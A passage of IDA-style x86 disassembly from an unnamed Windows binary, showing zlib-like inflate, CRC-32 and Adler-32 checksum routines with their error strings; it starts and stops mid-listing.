mov dword ptr [edx+18h], offset aEmptyDistanceT ; "empty distance tree with lengths"
mov [ebp+var_4], 0FFFFFFFDh
loc_42CF28: ; CODE XREF: sub_42CDD6+120�j
; sub_42CDD6+139�j ...
mov eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_20]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_20]
call dword ptr [eax+24h]
add esp, 8
mov eax, [ebp+var_4]
jmp short loc_42CF57
; ---------------------------------------------------------------------------
loc_42CF41: ; CODE XREF: sub_42CDD6+105�j
; sub_42CDD6+10E�j
mov ecx, [ebp+var_C]
push ecx
mov edx, [ebp+arg_20]
mov eax, [edx+28h]
push eax
mov ecx, [ebp+arg_20]
call dword ptr [ecx+24h]
add esp, 8
xor eax, eax
loc_42CF57: ; CODE XREF: sub_42CDD6+32�j
; sub_42CDD6+BB�j ...
mov esp, ebp
pop ebp
retn
sub_42CDD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CF5B proc near ; CODE XREF: sub_42B09D+1A8�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov dword ptr [eax], 9
mov ecx, [ebp+arg_4]
mov dword ptr [ecx], 5
mov edx, [ebp+arg_8]
mov dword ptr [edx], offset dword_433350
mov eax, [ebp+arg_C]
mov dword ptr [eax], offset dword_434350
xor eax, eax
pop ebp
retn
sub_42CF5B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CF86 proc near ; CODE XREF: sub_42A17E+106�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 48h
mov eax, [ebp+arg_14]
mov ecx, [eax]
mov [ebp+var_4], ecx
mov edx, [ebp+arg_14]
mov eax, [edx+4]
mov [ebp+var_34], eax
mov ecx, [ebp+arg_10]
mov edx, [ecx+20h]
mov [ebp+var_10], edx
mov eax, [ebp+arg_10]
mov ecx, [eax+1Ch]
mov [ebp+var_28], ecx
mov edx, [ebp+arg_10]
mov eax, [edx+34h]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_10]
mov edx, [ebp+var_8]
cmp edx, [ecx+30h]
jnb short loc_42CFD4
mov eax, [ebp+arg_10]
mov ecx, [eax+30h]
sub ecx, [ebp+var_8]
sub ecx, 1
mov [ebp+var_38], ecx
jmp short loc_42CFE0
; ---------------------------------------------------------------------------
loc_42CFD4: ; CODE XREF: sub_42CF86+3B�j
mov edx, [ebp+arg_10]
mov eax, [edx+2Ch]
sub eax, [ebp+var_8]
mov [ebp+var_38], eax
loc_42CFE0: ; CODE XREF: sub_42CF86+4C�j
mov ecx, [ebp+var_38]
mov [ebp+var_2C], ecx
mov edx, [ebp+arg_0]
mov eax, dword_433308[edx*4]
mov [ebp+var_24], eax
mov ecx, [ebp+arg_4]
mov edx, dword_433308[ecx*4]
mov [ebp+var_30], edx
loc_42D000: ; CODE XREF: sub_42CF86+AF�j
; sub_42CF86+639�j
cmp [ebp+var_28], 14h
jnb short loc_42D037
mov eax, [ebp+var_34]
sub eax, 1
mov [ebp+var_34], eax
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
mov ecx, [ebp+var_28]
shl edx, cl
mov eax, [ebp+var_10]
or eax, edx
mov [ebp+var_10], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_28]
add edx, 8
mov [ebp+var_28], edx
jmp short loc_42D000
; ---------------------------------------------------------------------------
loc_42D037: ; CODE XREF: sub_42CF86+7E�j
mov eax, [ebp+var_10]
and eax, [ebp+var_24]
mov ecx, [ebp+arg_8]
lea edx, [ecx+eax*8]
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_20], ecx
cmp [ebp+var_20], 0
jnz short loc_42D09A
mov edx, [ebp+var_1C]
xor eax, eax
mov al, [edx+1]
mov ecx, eax
mov edx, [ebp+var_10]
shr edx, cl
mov [ebp+var_10], edx
mov eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_28]
sub edx, ecx
mov [ebp+var_28], edx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_1C]
mov dl, [ecx+4]
mov [eax], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_2C]
sub ecx, 1
mov [ebp+var_2C], ecx
jmp loc_42D5B2
; ---------------------------------------------------------------------------
loc_42D09A: ; CODE XREF: sub_42CF86+CE�j
; sub_42CF86:loc_42D5AD�j
mov edx, [ebp+var_1C]
xor eax, eax
mov al, [edx+1]
mov ecx, eax
mov edx, [ebp+var_10]
shr edx, cl
mov [ebp+var_10], edx
mov eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_28]
sub edx, ecx
mov [ebp+var_28], edx
mov eax, [ebp+var_20]
and eax, 10h
test eax, eax
jz loc_42D3D9
mov ecx, [ebp+var_20]
and ecx, 0Fh
mov [ebp+var_20], ecx
mov edx, [ebp+var_20]
mov eax, [ebp+var_10]
and eax, dword_433308[edx*4]
mov ecx, [ebp+var_1C]
mov edx, [ecx+4]
add edx, eax
mov [ebp+var_14], edx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_20]
shr eax, cl
mov [ebp+var_10], eax
mov ecx, [ebp+var_28]
sub ecx, [ebp+var_20]
mov [ebp+var_28], ecx
loc_42D0FF: ; CODE XREF: sub_42CF86+1B0�j
cmp [ebp+var_28], 0Fh
jnb short loc_42D138
mov edx, [ebp+var_34]
sub edx, 1
mov [ebp+var_34], edx
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
mov edx, ecx
mov ecx, [ebp+var_28]
shl edx, cl
mov eax, [ebp+var_10]
or eax, edx
mov [ebp+var_10], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_28]
add edx, 8
mov [ebp+var_28], edx
jmp short loc_42D0FF
; ---------------------------------------------------------------------------
loc_42D138: ; CODE XREF: sub_42CF86+17D�j
mov eax, [ebp+var_10]
and eax, [ebp+var_30]
mov ecx, [ebp+arg_C]
lea edx, [ecx+eax*8]
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_20], ecx
loc_42D151: ; CODE XREF: sub_42CF86:loc_42D3CF�j
mov edx, [ebp+var_1C]
xor eax, eax
mov al, [edx+1]
mov ecx, eax
mov edx, [ebp+var_10]
shr edx, cl
mov [ebp+var_10], edx
mov eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_28]
sub edx, ecx
mov [ebp+var_28], edx
mov eax, [ebp+var_20]
and eax, 10h
test eax, eax
jz loc_42D2ED
mov ecx, [ebp+var_20]
and ecx, 0Fh
mov [ebp+var_20], ecx
loc_42D18A: ; CODE XREF: sub_42CF86+23B�j
mov edx, [ebp+var_28]
cmp edx, [ebp+var_20]
jnb short loc_42D1C3
mov eax, [ebp+var_34]
sub eax, 1
mov [ebp+var_34], eax
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
mov ecx, [ebp+var_28]
shl edx, cl
mov eax, [ebp+var_10]
or eax, edx
mov [ebp+var_10], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_28]
add edx, 8
mov [ebp+var_28], edx
jmp short loc_42D18A
; ---------------------------------------------------------------------------
loc_42D1C3: ; CODE XREF: sub_42CF86+20A�j
mov eax, [ebp+var_20]
mov ecx, [ebp+var_10]
and ecx, dword_433308[eax*4]
mov edx, [ebp+var_1C]
mov eax, [edx+4]
add eax, ecx
mov [ebp+var_18], eax
mov edx, [ebp+var_10]
mov ecx, [ebp+var_20]
shr edx, cl
mov [ebp+var_10], edx
mov eax, [ebp+var_28]
sub eax, [ebp+var_20]
mov [ebp+var_28], eax
mov ecx, [ebp+var_2C]
sub ecx, [ebp+var_14]
mov [ebp+var_2C], ecx
mov edx, [ebp+arg_10]
mov eax, [ebp+var_8]
sub eax, [edx+28h]
cmp eax, [ebp+var_18]
jb short loc_42D25B
mov ecx, [ebp+var_8]
sub ecx, [ebp+var_18]
mov [ebp+var_C], ecx
mov edx, [ebp+var_8]
mov eax, [ebp+var_C]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, 1
mov [ebp+var_14], ecx
mov edx, [ebp+var_8]
mov eax, [ebp+var_C]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, 1
mov [ebp+var_14], ecx
jmp short loc_42D2BD
; ---------------------------------------------------------------------------
loc_42D25B: ; CODE XREF: sub_42CF86+27E�j
mov edx, [ebp+arg_10]
mov eax, [ebp+var_8]
sub eax, [edx+28h]
mov ecx, [ebp+var_18]
sub ecx, eax
mov [ebp+var_20], ecx
mov edx, [ebp+arg_10]
mov eax, [edx+2Ch]
sub eax, [ebp+var_20]
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
cmp ecx, [ebp+var_20]
jbe short loc_42D2BD
mov edx, [ebp+var_14]
sub edx, [ebp+var_20]
mov [ebp+var_14], edx
loc_42D289: ; CODE XREF: sub_42CF86+32C�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
mov edx, [ebp+var_20]
sub edx, 1
mov [ebp+var_20], edx
cmp [ebp+var_20], 0
jnz short loc_42D289
mov eax, [ebp+arg_10]
mov ecx, [eax+28h]
mov [ebp+var_C], ecx
loc_42D2BD: ; CODE XREF: sub_42CF86+2D3�j
; sub_42CF86+2F8�j ...
mov edx, [ebp+var_8]
mov eax, [ebp+var_C]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, 1
mov [ebp+var_14], ecx
cmp [ebp+var_14], 0
jnz short loc_42D2BD
jmp loc_42D3D4
; ---------------------------------------------------------------------------
loc_42D2ED: ; CODE XREF: sub_42CF86+1F5�j
mov edx, [ebp+var_20]
and edx, 40h
test edx, edx
jnz short loc_42D32B
mov eax, [ebp+var_1C]
mov ecx, [eax+4]
mov edx, [ebp+var_1C]
lea eax, [edx+ecx*8]
mov [ebp+var_1C], eax
mov ecx, [ebp+var_20]
mov edx, [ebp+var_10]
and edx, dword_433308[ecx*4]
mov eax, [ebp+var_1C]
lea ecx, [eax+edx*8]
mov [ebp+var_1C], ecx
mov edx, [ebp+var_1C]
xor eax, eax
mov al, [edx]
mov [ebp+var_20], eax
jmp loc_42D3CF
; ---------------------------------------------------------------------------
loc_42D32B: ; CODE XREF: sub_42CF86+36F�j
mov ecx, [ebp+arg_14]
mov dword ptr [ecx+18h], offset aInvalidDista_0 ; "invalid distance code"
mov edx, [ebp+arg_14]
mov eax, [edx+4]
sub eax, [ebp+var_34]
mov [ebp+var_14], eax
mov ecx, [ebp+var_28]
shr ecx, 3
cmp ecx, [ebp+var_14]
jnb short loc_42D357
mov edx, [ebp+var_28]
shr edx, 3
mov [ebp+var_3C], edx
jmp short loc_42D35D
; ---------------------------------------------------------------------------
loc_42D357: ; CODE XREF: sub_42CF86+3C4�j
mov eax, [ebp+var_14]
mov [ebp+var_3C], eax
loc_42D35D: ; CODE XREF: sub_42CF86+3CF�j
mov ecx, [ebp+var_3C]
mov [ebp+var_14], ecx
mov edx, [ebp+var_34]
add edx, [ebp+var_14]
mov [ebp+var_34], edx
mov eax, [ebp+var_4]
sub eax, [ebp+var_14]
mov [ebp+var_4], eax
mov ecx, [ebp+var_14]
shl ecx, 3
mov edx, [ebp+var_28]
sub edx, ecx
mov [ebp+var_28], edx
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_10]
mov [eax+20h], ecx
mov edx, [ebp+arg_10]
mov eax, [ebp+var_28]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_14]
mov edx, [ebp+var_34]
mov [ecx+4], edx
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_14]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_14]
mov [ecx+8], eax
mov edx, [ebp+arg_14]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_10]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, 0FFFFFFFDh
jmp loc_42D657
; ---------------------------------------------------------------------------
loc_42D3CF: ; CODE XREF: sub_42CF86+3A0�j
jmp loc_42D151
; ---------------------------------------------------------------------------
loc_42D3D4: ; CODE XREF: sub_42CF86+362�j
jmp loc_42D5B2
; ---------------------------------------------------------------------------
loc_42D3D9: ; CODE XREF: sub_42CF86+13E�j
mov eax, [ebp+var_20]
and eax, 40h
test eax, eax
jnz short loc_42D461
mov ecx, [ebp+var_1C]
mov edx, [ecx+4]
mov eax, [ebp+var_1C]
lea ecx, [eax+edx*8]
mov [ebp+var_1C], ecx
mov edx, [ebp+var_20]
mov eax, [ebp+var_10]
and eax, dword_433308[edx*4]
mov ecx, [ebp+var_1C]
lea edx, [ecx+eax*8]
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_20], ecx
cmp [ebp+var_20], 0
jnz short loc_42D45C
mov edx, [ebp+var_1C]
xor eax, eax
mov al, [edx+1]
mov ecx, eax
mov edx, [ebp+var_10]
shr edx, cl
mov [ebp+var_10], edx
mov eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_28]
sub edx, ecx
mov [ebp+var_28], edx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_1C]
mov dl, [ecx+4]
mov [eax], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_2C]
sub ecx, 1
mov [ebp+var_2C], ecx
jmp loc_42D5B2
; ---------------------------------------------------------------------------
loc_42D45C: ; CODE XREF: sub_42CF86+490�j
jmp loc_42D5AD
; ---------------------------------------------------------------------------
loc_42D461: ; CODE XREF: sub_42CF86+45B�j
mov edx, [ebp+var_20]
and edx, 20h
test edx, edx
jz loc_42D509
mov eax, [ebp+arg_14]
mov ecx, [eax+4]
sub ecx, [ebp+var_34]
mov [ebp+var_14], ecx
mov edx, [ebp+var_28]
shr edx, 3
cmp edx, [ebp+var_14]
jnb short loc_42D491
mov eax, [ebp+var_28]
shr eax, 3
mov [ebp+var_40], eax
jmp short loc_42D497
; ---------------------------------------------------------------------------
loc_42D491: ; CODE XREF: sub_42CF86+4FE�j
mov ecx, [ebp+var_14]
mov [ebp+var_40], ecx
loc_42D497: ; CODE XREF: sub_42CF86+509�j
mov edx, [ebp+var_40]
mov [ebp+var_14], edx
mov eax, [ebp+var_34]
add eax, [ebp+var_14]
mov [ebp+var_34], eax
mov ecx, [ebp+var_4]
sub ecx, [ebp+var_14]
mov [ebp+var_4], ecx
mov edx, [ebp+var_14]
shl edx, 3
mov eax, [ebp+var_28]
sub eax, edx
mov [ebp+var_28], eax
mov ecx, [ebp+arg_10]
mov edx, [ebp+var_10]
mov [ecx+20h], edx
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_28]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_14]
mov eax, [ebp+var_34]
mov [edx+4], eax
mov ecx, [ebp+arg_14]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_14]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_14]
mov [edx+8], ecx
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_10]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov eax, 1
jmp loc_42D657
; ---------------------------------------------------------------------------
loc_42D509: ; CODE XREF: sub_42CF86+4E3�j
mov ecx, [ebp+arg_14]
mov dword ptr [ecx+18h], offset aInvalidLiter_0 ; "invalid literal/length code"
mov edx, [ebp+arg_14]
mov eax, [edx+4]
sub eax, [ebp+var_34]
mov [ebp+var_14], eax
mov ecx, [ebp+var_28]
shr ecx, 3
cmp ecx, [ebp+var_14]
jnb short loc_42D535
mov edx, [ebp+var_28]
shr edx, 3
mov [ebp+var_44], edx
jmp short loc_42D53B
; ---------------------------------------------------------------------------
loc_42D535: ; CODE XREF: sub_42CF86+5A2�j
mov eax, [ebp+var_14]
mov [ebp+var_44], eax
loc_42D53B: ; CODE XREF: sub_42CF86+5AD�j
mov ecx, [ebp+var_44]
mov [ebp+var_14], ecx
mov edx, [ebp+var_34]
add edx, [ebp+var_14]
mov [ebp+var_34], edx
mov eax, [ebp+var_4]
sub eax, [ebp+var_14]
mov [ebp+var_4], eax
mov ecx, [ebp+var_14]
shl ecx, 3
mov edx, [ebp+var_28]
sub edx, ecx
mov [ebp+var_28], edx
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_10]
mov [eax+20h], ecx
mov edx, [ebp+arg_10]
mov eax, [ebp+var_28]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_14]
mov edx, [ebp+var_34]
mov [ecx+4], edx
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_14]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_14]
mov [ecx+8], eax
mov edx, [ebp+arg_14]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_10]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, 0FFFFFFFDh
jmp loc_42D657
; ---------------------------------------------------------------------------
loc_42D5AD: ; CODE XREF: sub_42CF86:loc_42D45C�j
jmp loc_42D09A
; ---------------------------------------------------------------------------
loc_42D5B2: ; CODE XREF: sub_42CF86+10F�j
; sub_42CF86:loc_42D3D4�j ...
cmp [ebp+var_2C], 102h
jb short loc_42D5C5
cmp [ebp+var_34], 0Ah
jnb loc_42D000
loc_42D5C5: ; CODE XREF: sub_42CF86+633�j
mov eax, [ebp+arg_14]
mov ecx, [eax+4]
sub ecx, [ebp+var_34]
mov [ebp+var_14], ecx
mov edx, [ebp+var_28]
shr edx, 3
cmp edx, [ebp+var_14]
jnb short loc_42D5E7
mov eax, [ebp+var_28]
shr eax, 3
mov [ebp+var_48], eax
jmp short loc_42D5ED
; ---------------------------------------------------------------------------
loc_42D5E7: ; CODE XREF: sub_42CF86+654�j
mov ecx, [ebp+var_14]
mov [ebp+var_48], ecx
loc_42D5ED: ; CODE XREF: sub_42CF86+65F�j
mov edx, [ebp+var_48]
mov [ebp+var_14], edx
mov eax, [ebp+var_34]
add eax, [ebp+var_14]
mov [ebp+var_34], eax
mov ecx, [ebp+var_4]
sub ecx, [ebp+var_14]
mov [ebp+var_4], ecx
mov edx, [ebp+var_14]
shl edx, 3
mov eax, [ebp+var_28]
sub eax, edx
mov [ebp+var_28], eax
mov ecx, [ebp+arg_10]
mov edx, [ebp+var_10]
mov [ecx+20h], edx
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_28]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_14]
mov eax, [ebp+var_34]
mov [edx+4], eax
mov ecx, [ebp+arg_14]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_14]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_14]
mov [edx+8], ecx
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_10]
mov eax, [ebp+var_8]
mov [edx+34h], eax
xor eax, eax
loc_42D657: ; CODE XREF: sub_42CF86+444�j
; sub_42CF86+57E�j ...
mov esp, ebp
pop ebp
retn
sub_42CF86 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, offset dword_4346B4
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D665 proc near ; CODE XREF: sub_42F9A2+1D4�p
; sub_42F9A2+29A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
jnz short loc_42D675
xor eax, eax
jmp loc_42D83E
; ---------------------------------------------------------------------------
loc_42D675: ; CODE XREF: sub_42D665+7�j
mov eax, [ebp+arg_0]
xor eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
loc_42D67E: ; CODE XREF: sub_42D665+18C�j
cmp [ebp+arg_8], 8
jb loc_42D7F6
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4346B4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4346B4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4346B4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4346B4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4346B4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4346B4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4346B4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4346B4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_8]
sub ecx, 8
mov [ebp+arg_8], ecx
jmp loc_42D67E
; ---------------------------------------------------------------------------
loc_42D7F6: ; CODE XREF: sub_42D665+1D�j
cmp [ebp+arg_8], 0
jz short loc_42D838
loc_42D7FC: ; CODE XREF: sub_42D665+1D1�j
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+arg_0]
xor ecx, eax
and ecx, 0FFh
mov edx, [ebp+arg_0]
shr edx, 8
mov eax, dword_4346B4[ecx*4]
xor eax, edx
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_4]
add ecx, 1
mov [ebp+arg_4], ecx
mov edx, [ebp+arg_8]
sub edx, 1
mov [ebp+arg_8], edx
cmp [ebp+arg_8], 0
jnz short loc_42D7FC
loc_42D838: ; CODE XREF: sub_42D665+195�j
mov eax, [ebp+arg_0]
xor eax, 0FFFFFFFFh
loc_42D83E: ; CODE XREF: sub_42D665+B�j
pop ebp
retn
sub_42D665 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D840 proc near ; DATA XREF: sub_42DBE5+133�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
and eax, 0FFFFh
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
shr ecx, 10h
and ecx, 0FFFFh
mov [ebp+var_8], ecx
cmp [ebp+arg_4], 0
jnz short loc_42D870
mov eax, 1
jmp loc_42DAB3
; ---------------------------------------------------------------------------
loc_42D870: ; CODE XREF: sub_42D840+24�j
; sub_42D840+265�j
cmp [ebp+arg_8], 0
jbe loc_42DAAA
cmp [ebp+arg_8], 15B0h
jnb short loc_42D88B
mov edx, [ebp+arg_8]
mov [ebp+var_10], edx
jmp short loc_42D892
; ---------------------------------------------------------------------------
loc_42D88B: ; CODE XREF: sub_42D840+41�j
mov [ebp+var_10], 15B0h
loc_42D892: ; CODE XREF: sub_42D840+49�j
mov eax, [ebp+var_10]
mov [ebp+var_C], eax
mov ecx, [ebp+arg_8]
sub ecx, [ebp+var_C]
mov [ebp+arg_8], ecx
loc_42D8A1: ; CODE XREF: sub_42D840+20C�j
cmp [ebp+var_C], 10h
jl loc_42DA51
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
add edx, [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_4]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx+2]
mov eax, [ebp+var_4]
add eax, edx
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
add ecx, [ebp+var_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx+3]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
add edx, [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax+4]
mov edx, [ebp+var_4]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx+5]
mov eax, [ebp+var_4]
add eax, edx
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
add ecx, [ebp+var_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx+6]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
add edx, [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax+7]
mov edx, [ebp+var_4]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx+8]
mov eax, [ebp+var_4]
add eax, edx
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
add ecx, [ebp+var_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx+9]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
add edx, [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax+0Ah]
mov edx, [ebp+var_4]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx+0Bh]
mov eax, [ebp+var_4]
add eax, edx
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
